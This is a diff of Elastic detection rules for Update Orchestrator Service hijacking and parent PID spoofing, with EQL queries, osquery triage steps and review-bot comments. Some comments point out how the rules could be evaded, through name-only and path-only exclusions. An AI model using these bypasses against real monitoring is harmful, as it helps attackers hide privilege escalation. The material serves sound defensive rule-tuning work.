Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\") and\n not process.name : (\"MoUsoCoreWorker.exe\", \"OfficeC2RClient.exe\")\n", "references": [ "https://github.com/irsl/CVE-2020-1313" 
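Review bot: The trailing `not process.name : ("MoUsoCoreWorker.exe", "OfficeC2RClient.exe")` clause in the `query` (a context line of this hunk, not touched by the commit) excludes by bare file name, which makes the path-anchored `process.executable` entries for those two binaries above it redundant and lets a payload dropped anywhere on disk and named `MoUsoCoreWorker.exe` slip past the rule — exactly the hijack the rule is meant to catch. Either drop that clause and rely on the explicit paths, or tie it to the signer, e.g. `not (process.name : ("MoUsoCoreWorker.exe", "OfficeC2RClient.exe") and process.code_signature.trusted == true and process.code_signature.subject_name : "Microsoft*")`; whether the data sources this rule targets populate `process.code_signature.*` for every child of `svchost.exe` should be confirmed before relying on it. A smaller issue in the new `note` line: the step "searching for login events (for example, 4624) to the target host after the registry modification" refers to a registry change this rule never sees — it fires on a process start under `svchost.exe` with `UsoSvc` in its arguments — so "after the suspicious process start" would match the alert an analyst actually has.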
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -100,7 +100,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_109.json b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_109.json
index e4509d9c2e9..80935de7433 100644
--- a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_109.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Update Orchestrator Service Hijack", - "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\") and\n not process.name : (\"MoUsoCoreWorker.exe\", \"OfficeC2RClient.exe\")\n", "references": [ "https://github.com/irsl/CVE-2020-1313" 
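Review bot: The new `note` line's investigation step "searching for login events (for example, 4624) to the target host after the registry modification" points analysts at a registry event that this rule does not produce — the `query` matches `event.type == "start"` for a child of `svchost.exe` whose parent args contain `UsoSvc`, so there is no registry modification to pivot from; the sentence looks carried over from a registry-based rule's guide, and `...to the target host around the time of the suspicious process start.` would describe the alert an analyst actually holds. The same carried-over sentence is present in the `_108` version of this rule earlier in the diff. In the same `note`, the "False positive analysis" section states the activity is unlikely to be legitimate, yet the `query` has to carve out eleven Windows Update, WER and Office Click-to-Run binaries plus two bare names; a one-line list of those expected children (with `WerFault.exe`/`WerMgr.exe` presumably appearing for crash reporting of the service) would give analysts a baseline for judging an unlisted but benign child instead of sending every such alert to an exception.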
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -100,7 +100,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_3.json b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_3.json
index d1d5ed6ef5d..35c50c195a0 100644
--- a/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_3.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privileges Elevation via Parent Process PID Spoofing", - "query": "/* This rule is compatible with Elastic Endpoint only */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* process creation via seclogon */\n process.parent.Ext.real.pid \u003e 0 and\n\n /* PrivEsc to SYSTEM */\n user.id : \"S-1-5-18\" and\n\n /* Common FPs - evasion via hollowing is possible, should be covered by code injection */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n\n not process.parent.executable : \"?:\\\\Windows\\\\System32\\\\AtBroker.exe\" and\n\n not (process.code_signature.subject_name in\n (\"philandro Software GmbH\", \"Freedom Scientific Inc.\", \"TeamViewer Germany GmbH\", \"Projector.is, Inc.\",\n \"TeamViewer GmbH\", \"Cisco WebEx LLC\", \"Dell Inc\") and process.code_signature.trusted == true)\n", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* process creation via seclogon */\n process.parent.Ext.real.pid > 0 and\n\n /* PrivEsc to SYSTEM */\n user.id : \"S-1-5-18\" and\n\n /* Common FPs - evasion via hollowing is possible, should be covered by code injection */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n 
\"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n\n not process.parent.executable : \"?:\\\\Windows\\\\System32\\\\AtBroker.exe\" and\n\n not (process.code_signature.subject_name in\n (\"philandro Software GmbH\", \"Freedom Scientific Inc.\", \"TeamViewer Germany GmbH\", \"Projector.is, Inc.\",\n \"TeamViewer GmbH\", \"Cisco WebEx LLC\", \"Dell Inc\") and process.code_signature.trusted == true)\n",
 "references": [
 "https://gist.github.com/xpn/a057a26ec81e736518ee50848b9c2cd6",
 "https://blog.didierstevens.com/2017/03/20/",
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_4.json b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_4.json
index 088d94afbed..ee2fdb0d251 100644
--- a/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_4.json
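Review bot: The `process.executable` carve-outs in this `query` (context lines, unchanged by the commit) are path-only, while the vendor carve-out at the bottom correctly also demands `process.code_signature.trusted == true`; for the `System32`/`SysWOW64` entries that asymmetry is tolerable because writing there already requires admin, but `?:\\Windows\\SoftwareDistribution\\Download\\Install\\securityhealthsetup.exe` appears to be an update staging location rather than a protected binary directory, so a SYSTEM process spawned via seclogon from a file planted at that exact path is excluded on the strength of its name alone. If that directory is writable by a standard user on any supported build (worth confirming), this exclusion is a clean bypass of a high-severity rule. Pairing it with the signer keeps the FP suppression without trusting the path: `not (process.executable : "?:\\Windows\\SoftwareDistribution\\Download\\Install\\securityhealthsetup.exe" and process.code_signature.trusted == true and process.code_signature.subject_name : "Microsoft*")`. The existing `/* Common FPs - evasion via hollowing is possible, should be covered by code injection */` comment already concedes that path-based exclusions can be abused, which argues for the tighter form on the one entry that lives outside a protected directory.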
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privileges Elevation via Parent Process PID Spoofing", - "query": "/* This rule is compatible with Elastic Endpoint only */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* process creation via seclogon */\n process.parent.Ext.real.pid \u003e 0 and\n\n /* PrivEsc to SYSTEM */\n user.id : \"S-1-5-18\" and\n\n /* Common FPs - evasion via hollowing is possible, should be covered by code injection */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n\n not process.parent.executable : \"?:\\\\Windows\\\\System32\\\\AtBroker.exe\" and\n\n not (process.code_signature.subject_name in\n (\"philandro Software GmbH\", \"Freedom Scientific Inc.\", \"TeamViewer Germany GmbH\", \"Projector.is, Inc.\",\n \"TeamViewer GmbH\", \"Cisco WebEx LLC\", \"Dell Inc\") and process.code_signature.trusted == true)\n", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* process creation via seclogon */\n process.parent.Ext.real.pid > 0 and\n\n /* PrivEsc to SYSTEM */\n user.id : \"S-1-5-18\" and\n\n /* Common FPs - evasion via hollowing is possible, should be covered by code injection */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n 
\"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n\n not process.parent.executable : \"?:\\\\Windows\\\\System32\\\\AtBroker.exe\" and\n\n not (process.code_signature.subject_name in\n (\"philandro Software GmbH\", \"Freedom Scientific Inc.\", \"TeamViewer Germany GmbH\", \"Projector.is, Inc.\",\n \"TeamViewer GmbH\", \"Cisco WebEx LLC\", \"Dell Inc\") and process.code_signature.trusted == true)\n", "references": [ "https://gist.github.com/xpn/a057a26ec81e736518ee50848b9c2cd6", "https://blog.didierstevens.com/2017/03/20/", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_5.json b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_5.json index 85bf15e76fc..99eabb3b395 100644 --- a/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_5.json +++ b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_5.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privileges Elevation via Parent Process PID Spoofing", - "query": "/* This rule is compatible with Elastic Endpoint only */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* process creation via seclogon */\n process.parent.Ext.real.pid \u003e 0 and\n\n /* PrivEsc to SYSTEM */\n user.id : \"S-1-5-18\" and\n\n /* Common FPs - evasion via hollowing is possible, should be covered by code injection */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n /* Logon Utilities */\n not (process.parent.executable : \"?:\\\\Windows\\\\System32\\\\Utilman.exe\" and\n process.executable : (\"?:\\\\Windows\\\\System32\\\\osk.exe\",\n \"?:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"?:\\\\Windows\\\\System32\\\\Magnify.exe\")) and\n\n not process.parent.executable : 